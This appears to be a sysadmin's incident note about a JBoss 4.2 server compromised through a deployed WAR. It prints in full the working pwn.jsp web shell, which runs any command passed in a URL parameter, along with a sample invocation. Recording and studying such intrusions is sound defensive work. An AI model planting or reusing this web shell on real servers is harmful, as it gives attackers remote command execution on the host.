jboss 4.2 hacked by pwn.jsp

we found the following hack on our old jboss server this morning:
/path/to/jboss/server/mydomain/deploy/tmp5177256507206829158a-exp.war

the war has the following package structure:
├── META-INF
│   └── MANIFEST.MF
├── pwn.jsp
└── WEB-INF
    ├── lib
    └── web.xml

pwn.jsp

<%@ page import="java.util.*,java.io.*"%>
<%
String cmd;
String[] cmdarr;
String OS = System.getProperty("os.name");


    if (request.getParameter("cmd") != null) {
        cmd = new String (request.getParameter("cmd"));
      if (OS.startsWith("Windows")) {
       cmdarr = new String [] {"cmd", "/C", cmd};
      }
      else {
       cmdarr = new String [] {"/bin/sh", "-c", cmd};
      }
      Process p = Runtime.getRuntime().exec(cmdarr);
      OutputStream os = p.getOutputStream();
      InputStream in = p.getInputStream();
      DataInputStream dis = new DataInputStream(in);
      String disr = dis.readLine();
      while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
      }
    }
%>


web.xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
    PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
    "http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
</web-app>


when this gets deployed, you can run shell commands like this:

http://localhost:8080/tmp5177256507206829158a-exp/pwn.jsp?cmd=touch%20~/test

this creates a file called test in the home directory

the hacker can't however run any sudo commands, and can only run commands as the user that jboss is running as.

see also:
http://i8jesus.com/?p=191
https://www.netspi.com/blog/entryid/126/hacking-with-jsp-shells


TODO

run jboss as jboss user